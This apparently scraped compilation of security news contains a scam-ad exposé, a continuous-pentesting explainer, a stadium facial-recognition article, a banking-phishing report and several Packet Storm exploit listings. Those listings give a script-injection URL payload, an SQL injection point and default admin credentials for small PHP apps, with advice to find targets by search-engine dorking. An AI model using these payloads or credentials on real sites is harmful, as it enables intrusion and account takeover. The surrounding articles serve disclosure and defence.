We came a cross a clever abuse of Google and Microsoft's services that fooled us for a minute. See if you could have spotted it.

Many people turn to their favorite search engine when they are facing an issue with their computer. One common search query is to look for the telephone number or contact form for Microsoft, Apple or one of many other brands.

Scammers have long been interested in pretending to be Microsoft technical support. Years ago, inbound unsolicited calls were one of the most common techniques to bring in new victims. In more recent times, fake alerts that take over the browser claiming your computer is infected with viruses have been the dominant vector.

Today, we take a look at two subtle and extremely deceiving campaigns that leverage Google ads and Microsoft’s own infrastructure to create perfect scam scenarios that fooled us for a minute.

**Trick #1: Fake Helpdesk page via Microsoft Learn**

We found this ad while looking for Microsoft support live agents. The top (sponsored) result looks like it was bought by Microsoft itself with its official logo and URL.

Users who click on the ad are redirected to a legitimate Microsoft website (_learn.microsoft.com_) showing Microsoft’s “official” phone number. This page has the look and feel of a genuine knowledge base article especially since it appears to be posted by “Microsoft Support”:

Clicking the 3 dots beside the ad reveals that it actually doesn’t belong to Microsoft at all, but instead was paid for by an advertiser from Vietnam. This does not mean this is the actual scammer, simply that this account may have been compromised and is being used to create malicious ads.

As for the Microsoft page, it was created by a scammer via a fake Microsoft Support profile using Microsoft Learn collections.

> _Microsoft Learn Collections is a feature available to anyone with a Microsoft Learn profile. Collections allow you to create curated lists of Microsoft Learn content to share with your followers. A collection can include documentation articles, training modules, learning paths, videos, code samples, and more._

Here’s the profile for “Microsoft Support” that actually belongs to the scammer, using the profile id JamesKing-8561:

**Trick #2: Microsoft Search query hijack**

The second (unrelated) ad campaign we saw is using a different tactic but also starts with a Google ad. When victims clicking on it, it will launch a search query page via _microsoft.com/en-us/search/explore_.

This clever trick works by passing the following parameters to the URL:

Call+%2B1+%28844%29+327-5425++Microsoft+Support+%28USA%29

When the page finishes loading, it will display what looks like a contact number from Microsoft. In a way, this is a form of advertisement that totally abuses what the Microsoft search feature was intended for:

Fraudsters sitting in a far away call center pretending to be Microsoft technicians will trick victims into letting them onto their computers using remote access programs. The damage these scammers can do ranges from stealing a few hundred dollars as part of a “repair”, to emptying entire savings accounts.

Needless to say, you do not want to call these crooks, let alone grant them access to your computer.

**Getting real support**

Scammers are well aware that many people, especially the elderly, aren’t in a position to take their computers to a brick and mortar shop. Looking for help online from the convenience of their home is often the only option.

Here are some tips:

*   Never call a phone number that you see in an ad (search ad, or display ad).
*   To visit an official website, refrain from clicking on sponsored links. Instead, scroll further down and look for the organic search result.
*   Tip above does not take into account SEO poisoning, where scammers game search engines’ results. If you can, type in the website directly into the address bar.
*   Tip above does not take into account ‘typosquatting’ which is when you make a mistake in the spelling of the website and are redirected to a malicious site instead. This is something you should be aware of as well.
*   Perhaps there is help available locally, which you may get by asking a friend or acquaintance.

Finally, keep your computer up-to-date and secure with protection against malware and malicious websites. Malwarebytes‘ offering includes the free Browser Guard extension which secures your online browsing experience.

In the meantime, the real Microsoft website can be accessed at _support.microsoft.com_ and it looks like this (in the U.S.):

 PSA: These &#8216;Microsoft Support&#8217; ploys may just fool you 

Human Resource Management System version 2024 version 1.0 suffers from a cross site scripting vulnerability.

**Human Resource Management System 2024 1.0 Cross Site Scripting**

Posted Aug 26, 2024

Authored by indoushka

Human Resource Management System version 2024 version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 25f4d7b7ca25178696d74bb308a9abcdd65caa3fc6c471e46b4b16febaa084ea

Download | Favorite | View

**Human Resource Management System 2024 1.0 Cross Site Scripting**

    =============================================================================================================================================| # Title     : Human Resource Management System 2024 v1.0 XSS Vulnerability                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload :index.php?msg=Username%2520and%2520Password%2520is%2520Wrong!'"()%26%25<acx><ScRiPt >prompt(926738)</ScRiPt>[+] http://127.0.0.1/hrm/index.php?msg=Username%2520and%2520Password%2520is%2520Wrong!'"()%26%25<acx><ScRiPt >prompt(926738)</ScRiPt>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,543)
*   Arbitrary (16,904)
*   BBS (2,859)
*   Bypass (1,875)
*   CGI (1,034)
*   Code Execution (7,834)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,412)
*   DoS (25,116)
*   Encryption (2,389)
*   Exploit (53,289)
*   File Inclusion (4,263)
*   File Upload (1,000)
*   Firewall (822)
*   Info Disclosure (2,893)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (899)
*   Kernel (7,239)
*   Local (14,807)
*   Magazine (587)
*   Overflow (13,177)
*   Perl (1,435)
*   PHP (5,226)
*   Proof of Concept (2,394)
*   Protocol (3,731)
*   Python (1,646)
*   Remote (31,695)
*   Root (3,639)
*   Rootkit (528)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,031)
*   Shell (3,281)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,279)
*   SQL Injection (16,625)
*   TCP (2,444)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,016)
*   Web (9,973)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,267)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,109)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,895)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,615)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,780)
*   UNIX (9,441)
*   UnixWare (187)
*   Windows (6,676)
*   Other

Human Resource Management System 2024 1.0 Cross Site Scripting

What is Continuous Attack Surface Penetration Testing or CASPT?
Continuous Penetration Testing or Continuous Attack Surface Penetration Testing (CASPT) is an advanced security practice that involves the continuous, automated, and ongoing penetration testing services of an organization's digital assets to identify and mitigate security vulnerabilities. CASPT is designed for enterprises with an

****What is Continuous Attack Surface Penetration Testing or CASPT?****

Continuous Penetration Testing or Continuous Attack Surface Penetration Testing (CASPT) is an advanced security practice that involves the continuous, automated, and ongoing penetration testing services of an organization's digital assets to identify and mitigate security vulnerabilities. CASPT is designed for enterprises with an evolving attack surface where periodic pentesting is no longer sufficient. Unlike traditional penetration testing, which is often performed annually or semi-annually, CASPT is an ongoing process that integrates directly into the software development lifecycle (SDLC), ensuring that vulnerabilities are discovered and addressed in real-time or near-real-time.

CASPT is a proactive security measure designed to stay ahead of potential attackers by continuously evaluating the security posture of an organization. It enables security teams to identify critical entry points that could be exploited by attackers, validate the effectiveness of existing security controls, and ensure that any newly introduced code or infrastructure changes do not introduce new vulnerabilities. Users can run baseline tests to share changes or new updates across assets and associated vulnerabilities providing a roadmap for pentesting teams as soon as changes are detected.

****What Continuous Attack Surface Penetration Testing is Not****

While CASPT shares similarities with traditional penetration testing, there are distinct differences:

1.  **Not a One-Time Assessment**: Traditional penetration testing is typically a one-time assessment conducted periodically. CASPT, however, is an ongoing process, with tests running continuously or on a frequent, scheduled basis.
2.  **Not Just Automated**: CASPT is not limited to automated tools. While automation plays a significant role, continuous penetration testing also involves human expertise to conduct more sophisticated and context-aware attacks that automated tools might miss.
3.  **Not Isolated**: CASPT is not a standalone practice. It is integrated with other security measures such as Attack Surface Management (ASM) and Red Teaming exercises to provide a holistic view of an organization's security posture.

****How CASPT is Applied Across Different Assets****

Continuous Attack Surface Penetration Testing can be applied across a variety of digital assets, including:

1.  **Web Applications**: Continuous testing of web applications helps in identifying vulnerabilities like SQL injection, cross-site scripting (XSS), and broken authentication mechanisms. Automated tools can scan for known vulnerabilities, while manual testing can uncover complex logic flaws that automated tools might miss.
2.  **APIs**: As APIs become more prevalent, they present an increasing attack surface. API Penetration Testing ensures that they are secure against common threats such as API key leaks, broken object level authorization, and injection attacks.
3.  **Cloud Environments**: Cloud security is critical as more organizations move to cloud-based infrastructure. Continuous penetration testing in the cloud involves checking configurations, access controls, and potential vulnerabilities in cloud services to prevent unauthorized access and data breaches.
4.  **Networks**: Network security is a foundational aspect of any organization's security posture. Continuous penetration testing of networks involves scanning for open ports, misconfigured firewalls, and outdated software that could be exploited by attackers.
5.  **Mobile Applications**: With the proliferation of mobile apps, securing them is crucial. Continuous penetration testing for mobile apps focuses on vulnerabilities specific to mobile environments, such as insecure data storage, improper session handling, and weak encryption.

****Integration with Attack Surface Management and Red Teaming****

Integrating continuous penetration testing with Attack Surface Management (ASM) and red teaming offers a robust, dynamic security approach that enhances an organization's resilience against cyber threats. Here's how CASPT integration works and its benefits:

**1\. Continuous Attack Surface Pentesting**

CASPT involves the ongoing, automated assessment of an organization's systems to identify vulnerabilities. Unlike traditional, periodic pentests, this approach ensures that security assessments are always up to date, helping to discover new vulnerabilities as they emerge.

**2\. Attack Surface Management (ASM)**

ASM involves continuously monitoring and analyzing an organization's digital footprint to identify vulnerable assets and associate vulnerabilities for prioritization for mitigation of potential attack vectors. This prioritization acts as a roadmap for pentesting reducing valuable time and resources. When combined with CASPT, ASM helps organizations maintain an up-to-date understanding of their attack surface, ensuring that continuous penetration tests are focused on the most critical assets.

**3\. Red Teaming**

Red teaming simulates real-world cyberattacks by having a team of ethical hackers attempt to breach the organization's defenses. This provides a deeper understanding of the effectiveness of the security measures in place. When combined with CASPT, red teaming benefits from up-to-date knowledge of vulnerabilities and attack surfaces, making the simulations more accurate and relevant.

****How the Integration Works****

*   **Automation and Scalability**: CASPT tools are often automated, allowing them to scan for vulnerabilities at scale and in real-time. When integrated with ASM, these tools can prioritize scans based on the most critical assets or newly discovered attack surfaces, ensuring that the most significant risks are addressed first.
*   **Real-time Threat Detection**: ASM provides a real-time view of the organization's digital footprint, including any changes or new assets. CASPT can immediately test these new assets for vulnerabilities, reducing the window of opportunity for attackers.
*   **Enhanced Red Teaming**: Red teams can use the data from ASM and continuous pentesting to focus their efforts on the most critical and vulnerable areas. This targeted approach increases the likelihood of uncovering sophisticated attack vectors that may go unnoticed in a standard pentest.
*   **Proactive Security Posture**: By continuously identifying and testing vulnerabilities, organizations shift from a reactive to a proactive security posture. This approach not only helps in finding and fixing vulnerabilities before they are exploited but also in understanding how an attacker might move laterally through the network.

The benefits of integrating CASPT with other offensive security tools like ASM and red teaming are significant including a reduced attack surface, increased resilience to withstand real-world attacks, cost-efficiencies from reduced breaches and operational downtime, and meeting regulatory requirements by providing ongoing evidence of security practices and vulnerabilities management.

****Why Continuous Attack Surface Penetration Testing is Important****

The importance of CASPT is underscored by several key benefits:

****Cost-Effectiveness****

While the initial investment in CASPT may be higher than traditional penetration testing, the long-term cost savings are significant. By continuously identifying and mitigating vulnerabilities, organizations can avoid the costs associated with data breaches, regulatory fines, and reputational damage.

****Increased Visibility****

CASPT provides ongoing visibility into an organization's security posture. This enables security teams to identify and address vulnerabilities as they arise, rather than waiting for the next scheduled penetration test. For those providers who provide automated vulnerability validation and mapping, users will have enhanced visibility with an actual roadmap of all attack paths and routes to identified vulnerabilities remediating exposures before an actual attack can occur.

****Compliance****

Many regulatory frameworks and industry standards now require organizations to conduct regular security assessments. CASPT helps organizations meet these requirements by providing a continuous stream of security testing data that can be used to demonstrate compliance.

****Attack Path Validation and Mapping****

More innovative CASPT providers offer organizations with continuous validation of their attack paths by with an automatic visualization that maps out all potential routes an attacker might take to compromise critical assets from domain, subdomains, IP addresses, and discovered vulnerabilities. This enables security teams to focus their efforts on securing the most vulnerable areas of their environment.

****Why Annual Penetration Testing Isn't Enough Anymore****

We are all aware that the cybersecurity landscape is constantly evolving, with new threats and vulnerabilities emerging daily. Annual penetration testing, while valuable, is no longer sufficient to keep up with the pace of these changes. There are several reasons why annual penetration testing falls short:

1.  **Delayed Identification of Vulnerabilities**: With annual testing, vulnerabilities may remain undiscovered for months, leaving the organization exposed to potential attacks. CASPT, on the other hand, ensures that vulnerabilities are identified and addressed as soon as they are introduced.
2.  **Dynamic Environments:** Modern IT environments are highly dynamic, with frequent changes to code, infrastructure, and configurations. Annual or periodic pentesting does not account for these continuous changes, potentially missing critical vulnerabilities introduced between tests.
3.  **Increased Attack Sophistication**: Attackers are becoming more sophisticated, employing advanced techniques that can bypass traditional defenses. Continuous testing helps organizations stay ahead of these evolving threats by constantly evaluating their security posture.

****Top 10 Use Cases for Continuous Attack Surface Penetration Testing****

Considering CASPT depends on various factors related to the organization's security needs and business objectives, industry requirements, and threat landscape. Here's a deeper dive into various scenarios and when and why an organization might consider adopting CASPT:

****1\. Highly Dynamic Environments****

**Scenario**: Organizations with rapidly changing IT environments, such as those frequently deploying new applications, services, or updates.

**Reason:** In such environments, the attack surface is constantly evolving, and traditional periodic pentesting may miss newly introduced vulnerabilities. CASPT ensures that every change is tested for security weaknesses as soon as it's made, reducing the risk of unpatched vulnerabilities being exploited.

****2\. Regulatory and Compliance Requirements****

**Scenario**: Industries with strict compliance standards, such as finance, healthcare, or critical infrastructure, where maintaining high levels of security is mandatory.

**Reason:** CASPT provides ongoing evidence of vulnerability management and proactive security measures, helping organizations meet compliance requirements like PCI-DSS, HIPAA, or GDPR. This approach demonstrates a commitment to security, which is crucial for audits and regulatory reporting.

****3\. High-Value Targets****

**Scenario:** Organizations that are considered high-value targets for cyberattacks, such as those in finance, healthcare, government, or technology sectors.

**Reason:** High-value targets are more likely to be under constant threat from sophisticated attackers. CASPT helps to uncover vulnerabilities before attackers do, providing a critical layer of defense by constantly assessing and mitigating risks.

****4\. Mature Security Programs****

**Scenario:** Organizations that have already established a robust security program and are looking to move towards a more proactive security approach with offensive security tools.

**Reason:** For organizations with mature security practices, CASPT is a natural evolution. It complements existing security measures, balances existing defensive tools with offensive security tools, and provides ongoing validation of security controls, ensuring they remain effective against emerging threats.

****5\. Cloud-Native or Hybrid Environments****

**Scenario:** Organizations that heavily rely on cloud infrastructure or operate in hybrid or multicloud environments.

**Reason:** Cloud environments are often more fluid and dynamic, with assets being spun up and down frequently. CASPT in these environments ensures that security assessments are as agile as the infrastructure, addressing vulnerabilities in real-time and adapting to the shifting landscape.

****6\. Increased DevSecOps Practices****

**Scenario:** Organizations undergoing digital transformation initiatives, such as moving to microservices architectures, adopting DevOps practices, or integrating IoT devices.

**Reason:** Digital transformation often introduces new technologies and processes that may not have been fully assessed for security risks. CASPT provides a mechanism to ensure that as the organization transforms, security keeps pace with these changes, preventing gaps that could be exploited.

****7\. Merger & Acquisition(M&A) Activities****

**Scenario:** Organizations involved in mergers or acquisitions where networks, software, and people, processes, and technologies merge and overlap.

**Reason**: M&A activities can introduce new systems and networks into an organization, often with little time for traditional security assessments. CASPT ensures that any vulnerabilities in newly acquired assets are quickly identified and addressed, reducing the risk of integrating vulnerable systems.

****8\. Third-Party Risk Management****

**Scenario:** Organizations that rely heavily on third-party vendors or partners where the supply chain is changing, growing, or is fluid with incoming and outgoing vendors.

**Reason**: Third-party vendors can introduce vulnerabilities into an organization's environment especially as confidential and sensitive data is shared and exchanged between organizations. CASPT helps identify and mitigate these risks by regularly assessing third-party systems and integrations, ensuring they do not become an attack vector.

****9\. Alignment with DevSecOps****

**Scenario:** For organizations adopting DevSecOps practices, CASPT integrates seamlessly into the CI/CD pipeline, ensuring that security is embedded into the development process.

**Reason:** This helps in identifying vulnerabilities early in the software development life cycle (SDLC), reducing the cost and effort of fixing them later.

****10\. Enhanced Incident Response****

**Scenario**: Continuous pentesting provides a constant flow of security data, which can be invaluable for incident response teams.

**Reason:** This data helps in understanding the organization's security posture and in identifying potential weaknesses that could be exploited during an attack.

****When Not to Consider Continuous Pentesting****

Smaller organizations with limited security budgets or personnel may find it challenging to implement and manage CASPT. In such cases, using a third-party CASPT provider can help provide the expertise and resources needed. Also combined with periodic pentesting and other security measures may make CASPT more feasible.

In addition, organizations with relatively static IT environments may not require the constant assessment provided by CASPT. Periodic pentests, combined with regular security audits, may be sufficient to maintain security.

CASPT is particularly beneficial for organizations operating in dynamic, high-risk environments, those with stringent compliance requirements, or those looking to adopt a more proactive security posture. It provides real-time visibility into vulnerabilities, enhances risk management, and aligns well with modern security practices like DevSecOps.

****Best Practices for Implementing Continuous Attack Surface Penetration Testing****

Implementing CASPT requires careful planning and execution. Here are some best practices to consider:

1.  **Determine Frequency**: The frequency of CASPT should be based on the organization's risk profile, the criticality of assets, and the frequency of changes to the environment. For example, highly dynamic environments may require daily or weekly testing, while less dynamic environments may only need weekly or bi-monthly testing.
2.  **Set Clear Objectives and Goals:** Before implementing CASPT, organizations should define clear objectives and goals for the testing process. This includes identifying the assets to be tested, the types of vulnerabilities to focus on, and the desired outcomes of the testing.
3.  **Establish Clear Communication Channels:** Effective communication is critical to the success of CASPT. Organizations should establish clear communication channels between security teams, developers, and other stakeholders to ensure that vulnerabilities are addressed promptly.
4.  **Use of Both Manual and Automated Testing Techniques:** While automation is a key component of CASPT, manual testing is equally important. Automated tools can quickly identify known vulnerabilities, while manual testing can uncover more complex issues that require human expertise.

****Conclusion****

Continuous Attack Surface Penetration Testing represents a fundamental shift in how organizations approach security. By adopting a proactive, continuous approach to penetration testing, organizations can stay ahead of emerging threats, improve their security development cycle, and protect their most valuable assets. While the initial investment in CASPT may be higher, the long-term benefits—such as cost savings, increased visibility, and enhanced compliance—make it a critical component of any modern security strategy.

In a world where cyber threats are constantly evolving, annual penetration testing is no longer sufficient. Continuous Attack Surface Penetration Testing offers a more effective, comprehensive, and timely approach to securing an organization's digital assets. By integrating CASPT with other offensive security practices like Attack Surface Management and Red Teaming, organizations can ensure a robust offense against even the most sophisticated attackers.

In summary, Continuous Penetration Attack Surface Testing is not just a security measure—it's a strategic advantage. Organizations that embrace CASPT can expect to achieve greater resilience by taking the fight back to attackers and playing at their own game.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

The Facts About Continuous Penetration Testing and Why It’s Important

Protesters took to Citi Field Wednesday to raise awareness of the facial recognition systems that have become common at major league sporting venues.

Thousands of people lined up outside Citi Field in Queens, New York, on Wednesday to watch the Mets face off with the Orioles. But outside the ticketing booth, a handful of protesters handed out flyers. They were there to protest a recent Major League Baseball program, one that’s increasingly common in professional sports: using facial recognition on fans.

Facial recognition companies and their customers argue that these systems save time, and therefore money, by shortening lines at stadium entrances. However, skeptics argue that the surveillance tools are never totally secure, make it easier for police to get information about fans, and fuel “mission creep” where surveillance technology becomes more common or even required.

The MLB’s facial recognition program, dubbed Go-Ahead Entry, lets participating fans go on a separate security line, usually shorter than the other queues. Fans download the MLB Ballpark app, submit a selfie, and have their face matched at an in-person camera kiosk at a stadium’s entrance.

Six MLB teams are participating in Go-Ahead Entry, including the Philadelphia Phillies, Cincinnati Reds, Houston Astros, Kansas City Royals, San Francisco Giants, and Washington Nationals.

Some MLB teams, including the Mets, have their own facial recognition programs for express entry. The Mets have been using the facial recognition company Wicket for its Mets Entry Express program since 2021. The Cleveland Guardians, similarly, have been using technology from the company Clear at its ballpark, Progressive Field, since 2019.

Jeff Boehm, Wicket's chief operating officer, tells WIRED in an email that the company believes in “the responsible use of biometric technology to improve the event experience,” which includes taking “data security and privacy very seriously.”

Boehm adds: “As with many new technologies, there is misinformation out there about how the technology is being used. Contrary to some of these claims, Wicket's use is always 100% opt-in (and users can opt-out at any time) and we are not scanning people's faces without their consent. The data is not shared or sold to any third parties.”

Neither the Mets nor MLB immediately responded to WIRED’s requests for comment.

The National Football League has also started using Wicket facial recognition for express entry. NFL spokesperson Brian McCarthy said in an X post that the league-wide program, at least currently, is only available to "team/game-day personnel, vendors, and media”—not fans. The Cleveland Browns and Tennessee Titans, however, do have facial recognition entry systems that fans can use. (The news of the NFL’s expanded use of face recognition still caused confusion on Facebook and X, where some people thought facial recognition would be required at the stadiums for all 32 NFL teams.)

At Citi Field on Wednesday, the Mets Entry Express Line was used scarcely, perhaps five people every five minutes or so. There was never a line. The main security lines, though longer in comparison, took only about five minutes.

A group of privacy advocates stand outside Citi Field on Wednesday to warn fans about the growing use of facial recognition systems at sports events.Photograph: Caroline Haskins

Stadiums Are Embracing Face Recognition. Privacy Advocates Say They Should Stick to Sports

Mobile users in the Czech Republic are the target of a novel phishing campaign that leverages a Progressive Web Application (PWA) in an attempt to steal their banking account credentials.
The attacks have targeted the Czech-based Československá obchodní banka (CSOB), as well as the Hungarian OTP Bank and the Georgian TBC Bank, according to Slovak cybersecurity company ESET.
"The phishing

Mobile Security / Banking Fraud

Mobile users in the Czech Republic are the target of a novel phishing campaign that leverages a Progressive Web Application (PWA) in an attempt to steal their banking account credentials.

The attacks have targeted the Czech-based Československá obchodní banka (CSOB), as well as the Hungarian OTP Bank and the Georgian TBC Bank, according to Slovak cybersecurity company ESET.

"The phishing websites targeting iOS instruct victims to add a Progressive Web Application (PWA) to their home-screens, while on Android the PWA is installed after confirming custom pop-ups in the browser," security researcher Jakub Osmani said.

"At this point, on both operating systems, these phishing apps are largely indistinguishable from the real banking apps that they mimic."

What's notable about this tactic is that users are deceived into installing a PWA, or even WebAPKs in some cases on Android, from a third-party site without having to specifically allow side loading.

An analysis of the command-and-control (C2) servers used and the backend infrastructure reveals that two different threat actors are behind the campaigns.

These websites are distributed via automated voice calls, SMS messages, and social media malvertising via Facebook and Instagram. The voice calls warn users about an out-of-date banking app and ask them to select a numerical option, following which the phishing URL is sent.

Users who end up clicking on the link are displayed a lookalike page that mimics the Google Play Store listing for the targeted banking app, or a copycat site for the application, ultimately leading to the "installation" of the PWA or WebAPK app under the guise of an app update.

"This crucial installation step bypasses traditional browser warnings of 'installing unknown apps': this is the default behavior of Chrome's WebAPK technology, which is abused by the attackers," Osmani explained. "Furthermore, installing a WebAPK does not produce any of the 'installation from an untrusted source' warnings."

For those who are on Apple iOS devices, instructions are provided to add the bogus PWA app to the Home Screen. The end goal of the campaign is to capture the banking credentials entered on the app and exfiltrate them to an attacker-controlled C2 server or a Telegram group chat.

ESET said it recorded the first phishing-via-PWA instance in early November 2023, with subsequent waves detected in March and May 2024.

The disclosure comes as cybersecurity researchers have uncovered a new variant of the Gigabud Android trojan that's spread via phishing websites mimicking the Google Play Store or sites impersonating various banks or governmental entities.

"The malware has various capabilities such as the collection of data about the infected device, exfiltration of banking credentials, collection of screen recordings, etc.," Broadcom-owned Symantec said.

It also follows Silent Push's discovery of 24 different control panels for a variety of Android banking trojans such as ERMAC, BlackRock, Hook, Loot, and Pegasus (not to be confused with NSO Group's spyware of the same name) that are operated by a threat actor named DukeEugene.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Czech Mobile Users Targeted in New Banking Credential Theft Scheme

Jobs Finder System version 1.0 suffers from a remote SQL injection vulnerability.

**Jobs Finder System 1.0 SQL Injection**

Posted Aug 19, 2024

Authored by indoushka

Jobs Finder System version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | 0e14944aabacd3bde55dc9ca768a85b25224b5d197aed3ef9cecb63e14d97575

Download | Favorite | View

**Jobs Finder System 1.0 SQL Injection**

    =============================================================================================================================================| # Title     : jobs Finder System v1.0 SQL injection Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Jobs_Finder_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /jobs.php?id=3 <=== inject here[+] http://127.0.0.1/jobportal-master/jobs.php?id=3 [+]  Login : http://127.0.0.1/jobportal-master/login.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,460)
*   Arbitrary (16,885)
*   BBS (2,859)
*   Bypass (1,867)
*   CGI (1,033)
*   Code Execution (7,823)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,398)
*   DoS (25,094)
*   Encryption (2,389)
*   Exploit (53,232)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (898)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,727)
*   Python (1,646)
*   Remote (31,673)
*   Root (3,638)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,029)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,614)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,004)
*   Web (9,968)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,101)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,815)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,569)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,756)
*   UNIX (9,438)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Jobs Finder System 1.0 SQL Injection

Human Resource Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

**Human Resource Management System 2024 1.0 Insecure Settings**

Posted Aug 19, 2024

Authored by indoushka

Human Resource Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | bf20205d0167adcb0c48749ed7a50372cba24a18938ecfb734926b5099542af1

Download | Favorite | View

**Human Resource Management System 2024 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Human Resource Management System 2024 v1.0 Insecure Settings Vulnerability                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = admin#123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,460)
*   Arbitrary (16,885)
*   BBS (2,859)
*   Bypass (1,867)
*   CGI (1,033)
*   Code Execution (7,823)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,398)
*   DoS (25,094)
*   Encryption (2,389)
*   Exploit (53,232)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (898)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,727)
*   Python (1,646)
*   Remote (31,673)
*   Root (3,638)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,029)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,614)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,004)
*   Web (9,968)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,101)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,815)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,569)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,756)
*   UNIX (9,438)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Human Resource Management System 2024 1.0 Insecure Settings

Bhojon Restaurant Management System version 3.0 suffers from an ignored default credential vulnerability.

**Bhojon Restaurant Management System 3.0 Insecure Settings**

Posted Aug 19, 2024

Authored by indoushka

Bhojon Restaurant Management System version 3.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 5040244ae54e0b0c8ba29ab2d3b854826d64f8640404907653ffda5ea3f38ca6

Download | Favorite | View

**Bhojon Restaurant Management System 3.0 Insecure Settings**

